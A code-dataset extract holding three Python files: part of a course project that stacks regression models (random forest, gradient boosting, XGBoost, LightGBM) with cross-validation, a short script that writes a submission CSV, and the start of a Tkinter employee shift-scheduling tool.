val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n score_function = r2_score\n\n # =============Add different models here!!!!=============\n model_heads = []\n models = []\n from sklearn import tree # 0\n model_DecisionTreeRegressor = tree.DecisionTreeRegressor()\n model_heads.append(\"Decision Tree Regression\\t\\t\")\n models.append(model_DecisionTreeRegressor)\n \n from sklearn import linear_model # 1\n model_LinearRegression = linear_model.LinearRegression()\n model_heads.append(\"Linear Regression\\t\\t\\t\\t\")\n models.append(model_LinearRegression)\n \n from sklearn import svm # 2\n model_SVR = svm.SVR()\n model_heads.append(\"Support Vector Machine Regression\")\n models.append(model_SVR)\n \n from sklearn import neighbors # 3\n model_KNeighborsRegressor = neighbors.KNeighborsRegressor()\n model_heads.append(\"K-Nearest Neighbor Regression\\t\")\n models.append(model_KNeighborsRegressor)\n \n from sklearn import ensemble # 4\n model_RandomForestRegressor = ensemble.RandomForestRegressor(n_estimators=20)\n model_heads.append(\"Random Forest Regression\\t\\t\")\n models.append(model_RandomForestRegressor)\n \n from sklearn import ensemble # 5\n model_AdaBoostRegressor = ensemble.AdaBoostRegressor(n_estimators=150)\n model_heads.append(\"AdaBoost Regression\\t\\t\\t\\t\")\n models.append(model_AdaBoostRegressor)\n \n from sklearn import ensemble # 6\n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n model_heads.append(\"Gradient Boosting Regression\\t\")\n models.append(model_GradientBoostingRegressor)\n \n from sklearn.ensemble import BaggingRegressor # 7\n model_BaggingRegressor = BaggingRegressor()\n model_heads.append(\"Bagging Regression\\t\\t\\t\\t\")\n models.append(model_BaggingRegressor)\n \n from sklearn.tree import ExtraTreeRegressor # 8\n model_ExtraTreeRegressor = ExtraTreeRegressor()\n model_heads.append(\"ExtraTree Regression\\t\\t\\t\")\n models.append(model_ExtraTreeRegressor)\n \n import xgboost as xgb # 9\n # params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n # 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model_XGBoostRegressor = xgb.XGBRegressor()\n model_heads.append(\"XGBoost Regression\\t\\t\\t\\t\")\n models.append(model_XGBoostRegressor)\n # =============Model Adding Ends=============\n \n # =============For Esemble and Stacking =============\n from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\n from sklearn.kernel_ridge import KernelRidge\n from sklearn.pipeline import make_pipeline\n from sklearn.preprocessing import RobustScaler\n from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\n from sklearn.model_selection import KFold\n import xgboost as xgb\n import lightgbm as lgb\n from sklearn import linear_model\n from sklearn.tree import DecisionTreeRegressor \n from sklearn.ensemble import ExtraTreesRegressor\n\n\n \n #原组合:Enet+KRR+GBoost+lasso(meta)+xgb+lgb\n #新组合:adaboost+RandomForest+GBoost+lasso(meta)+xgb+lgb\n '''\n #lasso\n print('Bayes_Optimization(lasso)')\n alp = self.bayes_optimization.Bayes_opt_lasso(train_X = train_X, train_Y = train_Y)\n lasso = make_pipeline(RobustScaler(), Lasso(alpha = alp, random_state=1))\n #lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\n '''\n #extra_tree\n print('Bayes_Optimization(extra_tree)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_extratree(train_X = train_X, train_Y = train_Y) \n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n #adaboost\n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n #RandomForest\n print('Bayes_Optimization(RandomForest)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_RandomForest(train_X = train_X, train_Y = train_Y) \n RandomForest = ensemble.RandomForestRegressor(n_estimators = n_es,\n max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, \n random_state = 2)\n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n #xgb\n model_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,\n learning_rate=0.05, max_depth=3,\n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, silent=1,\n random_state =7, nthread = -1)\n #lgb\n model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n learning_rate=0.05, n_estimators=720,\n max_bin = 55, bagging_fraction = 0.8,\n bagging_freq = 5, feature_fraction = 0.2319,\n feature_fraction_seed=9, bagging_seed=9,\n min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n \n \n def get_model_score(model, x_all, y_all, n_folds=5):\n #交叉验证求r2_score\n score_func = r2_score\n kf = KFold(n_splits=n_folds, shuffle=True)\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test += score_test\n score_mean_train += score_train\n score_mean_test /= n_folds\n score_mean_train /= n_folds\n return score_mean_test\n \n \n def try_different_method(model, x_train, y_train, x_test, y_test, score_func):\n #求模型分数\n \"\"\"\n Inner function in train_evaluate_return_best_model for model training.\n :param model: one specific model\n :param x_train:\n :param y_train:\n :param x_test:\n :param y_test:\n :param score_func:\n :return score:\n \"\"\"\n model.fit(x_train, y_train)\n result_test = model.predict(x_test)\n result_train = model.predict(x_train)\n return score_func(y_test, result_test), score_func(y_train, result_train)\n \n \n class StackingAveragedModels(BaseEstimator, RegressorMixin, TransformerMixin):\n #定义StackingAveragedModels\n \"\"\"\n from https://www.kaggle.com/serigne/stacked-regressions-top-4-on-leaderboard\n \"\"\"\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred.ravel()\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n # Do the predictions of all base models on the test data and use the averaged predictions as\n # meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_])\n return self.meta_model_.predict(meta_features)\n \n # =============For Esemble and Stacking(end)=============\n \n \n \n def train_evaluate_return_best_model(x_all, y_all, score_func=r2_score, fold_num=5, return_ave=False):\n \"\"\"\n Train predefined models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :param return_ave: return average performance on all methods?\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Training model with K-fords...\")\n kf = KFold(n_splits=fold_num, shuffle=True)\n best_score = 0\n best_idx = 0\n ave_score = 0\n for (model_idx, model) in enumerate(models):\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test+=score_test\n score_mean_train+=score_train\n score_mean_test /= fold_num\n score_mean_train /= fold_num\n ave_score += score_mean_test\n if not return_ave:\n print(\"{} \\t score train: {}, score test: {}\".format(model_heads[model_idx], score_mean_train, score_mean_test))\n if best_score < score_mean_test:\n best_score = score_mean_test\n best_idx = model_idx\n print(\"Training done\")\n print(\"Best model: {}\\t Score: {}\".format(model_heads[best_idx], best_score))\n if return_ave:\n print(\"Average score on {} models = {}\".format(len(models), ave_score/len(models)))\n best_model = models[best_idx]\n best_model.fit(x_all, y_all)\n return best_idx, best_model\n \n def tune_model_params(x_all, y_all):\n \"\"\"\n Tune models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Tuning model...\")\n cv_params = {'reg_alpha': [0.05, 0.1, 1, 2, 3], 'reg_lambda': [0.05, 0.1, 1, 2, 3]}\n other_params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model = xgb.XGBRegressor(**other_params)\n optimized_GBM = GridSearchCV(estimator=model, param_grid=cv_params, scoring='r2', cv=5, verbose=1, n_jobs=1)\n optimized_GBM.fit(x_all, y_all)\n evalute_result = optimized_GBM.grid_scores_\n print('Result:{0}'.format(evalute_result))\n print('Best params:{0}'.format(optimized_GBM.best_params_))\n print('Best score:{0}'.format(optimized_GBM.best_score_))\n \n def get_model(x_all, y_all, model_idx):\n \"\"\"\n Given model index return the corresponding model trained on all data\n :param x_all:\n :param y_all:\n :param model_idx:\n :return model:\n \"\"\"\n print()\n print(\"Training with all data using {}\".format(model_heads[model_idx]))\n model = models[model_idx].fit(x_all, y_all)\n return model\n \n \n '''\n print('Find best models:')\n find_best_model = False # display several preselected models' results (5-folds)\n if find_best_model:\n # show some results\n _, _ = train_evaluate_return_best_model(x_all=train_X, y_all=train_Y,\n score_func=score_function, fold_num=5)\n '''\n # =================================================\n # Ensemble + stacking\n # =================================================\n print()\n print(\"Ensemble start...\")\n '''\n score = get_model_score(lasso, train_X, train_Y)\n print(\"\\nLasso score: {:.4f}\\n\".format(score))\n '''\n score = get_model_score(extra_tree, train_X, train_Y)\n print(\"\\nextra_tree score: {:.4f}\\n\".format(score))\n score = get_model_score(Adaboost, train_X, train_Y)\n print(\"Adaboost score: {:.4f}\\n\".format(score))\n score = get_model_score(RandomForest, train_X, train_Y)\n print(\"Randomforest score: {:.4f}\\n\".format(score))\n score = get_model_score(Gboost, train_X, train_Y)\n print(\"Gradient Boosting score: {:.4f}\\n\".format(score))\n score = get_model_score(model_xgb, train_X, train_Y)\n print(\"Xgboost score: {:.4f}\\n\".format(score))\n score = get_model_score(model_lgb, train_X, train_Y)\n print(\"LGBM score: {:.4f}\\n\".format(score))\n \n \n #stacked_averaged_models = StackingAveragedModels(base_models=(ENet, GBoost, KRR),\n #meta_model=lasso)\n stacked_averaged_models = StackingAveragedModels(base_models=(Adaboost, RandomForest, Gboost),\n meta_model=extra_tree) \n score = get_model_score(stacked_averaged_models, train_X, train_Y)\n print(\"Stacking Averaged models score: {:.4f}\".format(score))\n stacked_averaged_models.fit(train_X, train_Y)\n stacked_train_pred = stacked_averaged_models.predict(train_X)\n stacked_pred = stacked_averaged_models.predict(val_X)\n print('r2 score of stack models on train data:', r2_score(train_Y, stacked_train_pred))\n model_xgb.fit(train_X, train_Y)\n xgb_train_pred = model_xgb.predict(train_X)\n xgb_pred = model_xgb.predict(val_X)\n print('r2 score of xgb on train data:', r2_score(train_Y, xgb_train_pred))\n model_lgb.fit(train_X, train_Y)\n lgb_train_pred = model_lgb.predict(train_X)\n lgb_pred = model_lgb.predict(val_X)\n print('r2 score of lgb on train data:', r2_score(train_Y, lgb_train_pred))\n print('r2 score on train data:')\n print(r2_score(train_Y, stacked_train_pred * 0.70 +\n xgb_train_pred * 0.15 + lgb_train_pred * 0.15))\n model_ensemble = stacked_pred * 0.70 + xgb_pred * 0.15 + lgb_pred * 0.15\n \n self.log_factory.InfoLog(\"The score of ensemble for validation={}\".format(r2_score(val_Y, model_ensemble)))\n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': model_ensemble})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(\n stacked_averaged_models.predict(self.validation_X.cpu().numpy()) * 0.70 \n + model_xgb.predict(self.validation_X.cpu().numpy()) * 0.15 \n + model_lgb.predict(self.validation_X.cpu().numpy()) * 0.15)\n #==============ensemble模型结束======================\n \n \n elif self.model_name == \"nnet\":\n self.train_model.initialization()\n computed_losses = []\n train_losses = []\n for epoch in range(self.train_model.total_epoch):\n stride = self.full_X.shape[0] // self.k_fold\n train_X, train_Y, test_X, test_Y = None, None, None, None\n\n test_loss = 0.0\n train_loss = 0.0\n test_mse = 0.0\n train_mse = 0.0\n test_r2_score = 0.0\n self.train_model.train()\n idx = [i for i in range(self.full_X.shape[0])]\n sampled_idx = random.sample(idx, self.full_Y.shape[0])\n for i in range(self.k_fold):\n indicator = np.array([False for i in range(self.full_X.shape[0])])\n if i != self.k_fold - 1:\n indicator[sampled_idx[i * stride: (i + 1) * stride]] = True\n else:\n indicator[sampled_idx[i * stride:]] = True\n # k-fold CV\n train_X = self.full_X[indicator == False, :]\n train_Y = self.full_Y[indicator == False, :]\n test_X = self.full_X[indicator == True, :]\n test_Y = self.full_Y[indicator == True, :]\n\n self.train_model.optimizer.zero_grad()\n predicted_y = self.train_model(train_X)\n temp_loss = self.train_model.compute_loss(predicted_y, train_Y)\n temp_loss.backward()\n self.train_model.optimizer.step()\n\n with torch.no_grad():\n train_loss += temp_loss.item() / self.k_fold\n predicted_y_test = self.train_model(test_X)\n test_loss += self.train_model.compute_loss(predicted_y_test, test_Y) / self.k_fold\n train_mse += F.mse_loss(predicted_y, train_Y) / self.k_fold\n test_mse += F.mse_loss(predicted_y_test, test_Y) / self.k_fold\n test_r2_score += r2_score(test_Y.cpu().numpy(), predicted_y_test.cpu().numpy()) / self.k_fold\n\n if epoch % 200 == 0:\n self.log_factory.InfoLog(\n \"Epoch={}, while test loss={}, train loss={}, test MSE={}, train MSE={}, r2_score={}\".format(\n epoch, test_loss, train_loss, test_mse, train_mse, test_r2_score))\n computed_losses.append(test_loss.detach().clone().cpu())\n train_losses.append(train_loss)\n with torch.no_grad():\n predicted_y_validate = self.train_model(self.validation_X).squeeze(1).cpu().numpy()\n self.dump_validated_y(predicted_y_validate)\n model_evaluation(computed_losses, train_losses, epoch_step=200)\n\n def kill(self):\n self.log_factory.kill()\n\n def dump_validated_y(self, predicted_y_validate):\n np_full_Y = self.full_Y\n try:\n np_full_Y = self.full_Y.squeeze(1).cpu().numpy()\n predicted_y_validate = predicted_y_validate.cpu().numpy()\n except:\n pass\n\n if self.y_normalizer.initialized:\n predicted_y_validate = self.y_normalizer.decode(predicted_y_validate)\n np_full_Y = self.y_normalizer.decode(np_full_Y)\n\n fig = plt.figure(1)\n plt.scatter([1 for i in range(self.full_Y.shape[0])], np_full_Y, edgecolors='r')\n plt.scatter([2 for i in range(len(predicted_y_validate))], predicted_y_validate, edgecolors='b')\n fig.savefig(os.path.join(self.data_path, \"distribution.png\"))\n\n with open(os.path.join(self.data_path, \"y_validate.csv\"), 'w') as f:\n f.write(\"id,y\\n\")\n for i, pred_y in enumerate(predicted_y_validate):\n f.write(\"{},{}\\n\".format(i, pred_y))\n f.close()\n \n\n \n\n","repo_name":"GeCao/AML","sub_path":"Task1/src/CoreManagement.py","file_name":"CoreManagement.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"28262302358","text":"import argparse\nimport json\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"create sub\")\n\n parser.add_argument(\"exp\")\n args = parser.parse_args()\n\n with open(f\"data/output/{args.exp}.json\", \"r\") as f:\n result = json.load(f)\n\n pred = result[\"output\"][\"pred\"]\n\n sub = pd.read_csv(\"data/submit_sample.csv\", names=[\"id\", \"pred\"])\n sub[\"pred\"] = pred\n\n sub.to_csv(f\"data/subs/{args.exp}.csv\", header=False, index=False)\n","repo_name":"habroptilus/ds-monorepo","sub_path":"projects/sony/create_sub.py","file_name":"create_sub.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72671563564","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter.ttk import *\r\nimport EmployeeData\r\nimport Classes\r\nfrom Edit_Emp import values\r\nimport copy\r\n\r\n\r\n\r\ndef generate(gen_win):\r\n def generate_scheudle(new_emp_list, shifts, weekly_rest):\r\n def checks():\r\n #checking if the employee is not already in current shift, previous shift or next shift\r\n if shifts_sorted[x].shift_num%2 == 0:\r\n shifts_check = []\r\n i = -4\r\n while i < 6:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n else:\r\n shifts_check = []\r\n i = -5\r\n while i < 5:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n\r\n #Checking if the employee has not yet exceeded the limitation of 7 nights per 2 weeks\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5) and new_emp_list[count].last_week_nights + 1 == 8:\r\n return False\r\n if new_emp_list[count].num_of_shifts == 0:\r\n return False\r\n return True\r\n\r\n def sort_by_weeklyshifts(elem):\r\n return elem.weekly_rest_num\r\n\r\n def sort_by_amount(elem):\r\n return elem.num_of_shifts\r\n\r\n\r\n new_emp_list = sorted(new_emp_list, key = sort_by_weeklyshifts)\r\n shifts_sorted = []\r\n for x in range(42):\r\n shifts_sorted.append(Classes.Shift(x,len(shifts[x]),copy.deepcopy(shifts[x])))\r\n shifts_sorted = sorted(shifts_sorted, key = sort_by_amount)\r\n\r\n for x in range(0,42,2):\r\n if weekly_rest[shifts_sorted[x].shift_num] == 0:\r\n found = False\r\n count = 0\r\n while found == False and count < len(new_emp_list):\r\n if new_emp_list[count].employee_number in shifts_sorted[x].list_of_employees:\r\n if checks():\r\n weekly_rest[shifts_sorted[x].shift_num]= new_emp_list[count].employee_number\r\n new_emp_list[count].num_of_shifts -= 1\r\n found = True\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5):\r\n new_emp_list[count].last_week_nights += 1\r\n new_emp_list[count].weekly_rest_num -= 1\r\n while count15 and x<20):\r\n continue\r\n if employee_number not in shifts[x*2+1]:\r\n shifts[x*2+1].append(employee_number)\r\n weekly_counter += 1\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].append(employee_number)\r\n weekly_counter += 1\r\n else:\r\n if employee_number in shifts[x*2+1]:\r\n shifts[x*2+1].remove(employee_number)\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].remove(employee_number)\r\n emp_list[employee_number-1].weekly_rest_num = weekly_counter\r\n combo.configure(state = 'normal')\r\n select_btn.config(state='normal')\r\n emp_rest.destroy()\r\n\r\n\r\n\r\n emp_rest = Toplevel()\r\n emp_rest.geometry('600x300')\r\n emp_rest.title(\"Personal Employee Restrictions\")\r\n employee_number = int(combo.get().split(':')[0])\r\n headline_personal = Label(emp_rest, font = 'Ariel 14 bold underline', justify='center', text=combo.get()[2:])\r\n headline_personal.grid(row=0, pady=5)\r\n\r\n # frame for the days of the week on top\r\n frame_body = Frame(emp_rest, relief='groove')\r\n frame_body.grid(row=1, pady=10, padx=10)\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row = 0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n # frame for the comboboxes\r\n frame_body_left = Frame(frame_body, relief='groove')\r\n frame_body_left.grid(row=1, column=0, sticky='w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row=1, column=1)\r\n\r\n combo_shifts = []\r\n row2 = 0\r\n column2 = 0\r\n for x in range(21):\r\n shift_box = Combobox(frame_body_right, values='\" \" Yes', width = 5)\r\n shift_box.current(0)\r\n combo_shifts.append(shift_box)\r\n combo_shifts[x].grid(row= row2, column=column2, padx=7, pady=8)\r\n if int(combo.get().split(':')[0]) in shifts[x*2+1] or int(combo.get().split(':')[0]) in shifts[x*2]:\r\n combo_shifts[x].current(1)\r\n row2 += 1\r\n if row2%3 == 0:\r\n row2 = 0\r\n column2 +=1\r\n\r\n save_btn = Button(emp_rest, text = 'save', command = save_shifts)\r\n save_btn.grid(row = 2, pady = 8)\r\n emp_rest.protocol(\"WM_DELETE_WINDOW\", close_win)\r\n\r\n\r\n # Checking the restrictions of maximum 3 consecutive Saturdays and up to 7 nights per week\r\n # For the hand picked restrictions\r\n def check_restrictions():\r\n new_emp_list = copy.deepcopy(emp_list)\r\n weekly_rest = []\r\n for x in range(42):\r\n weekly_rest.append(int(restrictions[x].get().split(':')[0]))\r\n if (x%6 == 4 or x%6 == 5) and int(restrictions[x].get().split(':')[0]) != 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights + 1 == 8:\r\n messagebox.showerror('Restrictions Error',\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than\"\r\n \" 7 nights per 2 weeks\")\r\n return\r\n else:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights += 1\r\n elif (x>31 and x<40) and (int(restrictions[x].get().split(':')[0]) != 0):\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].saturdays + 1 == 4:\r\n messagebox.showerror('Restrictions Error', new_emp_list[int(\r\n restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than 3 consecutive Saturdays\")\r\n return\r\n if int(restrictions[x].get().split(':')[0]) > 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0])-1].num_of_shifts > 0:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].num_of_shifts -= 1\r\n else:\r\n pass\r\n for x in range(4):\r\n if int(last_week[x].get().split(':')[0]) == 0:\r\n messagebox.showerror('Restrictions Error', \" Last Saturday shifts fields must be filled\")\r\n return\r\n weekly_rest.append(int(last_week[x].get().split(':')[0]))\r\n generate_scheudle(new_emp_list, shifts, weekly_rest)\r\n\r\n\r\n\r\n\r\n #main part of generating the schedule\r\n emp_list = EmployeeData.importList()\r\n\r\n\r\n\r\n headline = Label(gen_win, text=\"Generate New Schedule\", font=\"Ariel 14 bold underline\", justify = 'center')\r\n headline.grid(row=0, pady=10)\r\n select_emp = Label(gen_win, text = \"Restrictions\", font = \"Ariel 12 bold underline\")\r\n select_emp.grid(row = 1, column = 0, padx = 10, pady = 10)\r\n\r\n\r\n #main frame for hand picking shifts\r\n frame_body = Frame(gen_win, relief = 'groove', width = 500, height = 500)\r\n frame_body.grid(row =2, padx = 10, pady = 10)\r\n\r\n #frame for the days of the week on top\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row =0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n #frame for days and positions\r\n frame_body_left = Frame(frame_body, relief = 'groove')\r\n frame_body_left.grid(row = 2, column = 0, sticky = 'w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n for x in range(0,5,2):\r\n lbl_incharge = Label(frame_body_left, text = \"Incharge\")\r\n lbl_patrol = Label(frame_body_left, text = \"Patrol\")\r\n lbl_incharge.grid(row = x, column = 1, padx = 2, pady = 2)\r\n lbl_patrol.grid(row = x+1, column = 1, padx =2, pady =2)\r\n\r\n\r\n #Creates and places a weekly restrictions table for the supervisor to hand pick\r\n frame_body_main = Frame(frame_body, relief = 'groove')\r\n frame_body_main.grid(row = 2, column = 1)\r\n restrictions = []\r\n row1 = 0\r\n column1 = 0\r\n for x in range(0, 42,2):\r\n combo_shift = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift.configure(value=values(emp_list))\r\n restrictions.append(combo_shift)\r\n restrictions[x].grid(row= row1, column=column1, padx=2, pady=5)\r\n combo_shift2 = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift2.configure(value=values(emp_list))\r\n restrictions.append(combo_shift2)\r\n restrictions[x+1].grid(row=row1+1, column=column1, padx=2, pady=5)\r\n restrictions[x].current(0)\r\n restrictions[x+1].current(0)\r\n row1 += 2\r\n if row1%6 == 0:\r\n row1 = 0\r\n column1 +=1\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row = 2, column = 2, padx = 5)\r\n headline2 = Label(frame_body_right, font='Ariel 12 bold underline', text=\"Saturday shifts:\")\r\n headline2.grid(row=0, pady = 12, padx = 5)\r\n\r\n frame_left = Frame(frame_body_right)\r\n frame_left.grid(row=1, column=0)\r\n frame_right = Frame(frame_body_right, height = 300, width = 200)\r\n frame_right.grid(row=1, column=1)\r\n\r\n # frame for days and positions\r\n lbl_after = Label(frame_left, text=\"Afternoon:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_left, text=\"Night:\").grid(row=2, column=0, padx=10, pady=10)\r\n for x in range(0, 3, 2):\r\n lbl_incharge = Label(frame_left, text=\"Incharge\")\r\n lbl_patrol = Label(frame_left, text=\"Patrol\")\r\n lbl_incharge.grid(row=x, column=1, padx=2, pady=2)\r\n lbl_patrol.grid(row=x + 1, column=1, padx=2, pady=2)\r\n last_week = []\r\n for x in range(4):\r\n combo_last_week = Combobox(frame_right, width=8, value = values(emp_list))\r\n combo_last_week.grid(row=x, padx = 10, pady = 4)\r\n combo_last_week.current(0)\r\n last_week.append(combo_last_week)\r\n\r\n\r\n #This bit is for the personal restrictions that the employees themselves have sent\r\n #creating a shifts variable, a list of lists that in it there would be the the employees willing work each shift\r\n shifts = []\r\n for x in range(42):\r\n shifts.append([])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n frame_btm = Frame(gen_win, width = 500, height = 500)\r\n frame_btm.grid(row =3, pady=30)\r\n\r\n combo = Combobox(frame_btm, state='readonly')\r\n combo.configure(value=values(emp_list))\r\n choose_emp = Label(frame_btm, text=\"Choose employee: \")\r\n choose_emp.grid(row=0, padx=20, column=0, sticky = 'w')\r\n combo.grid(row=0, column=1, padx=20)\r\n combo.current(0)\r\n select_btn 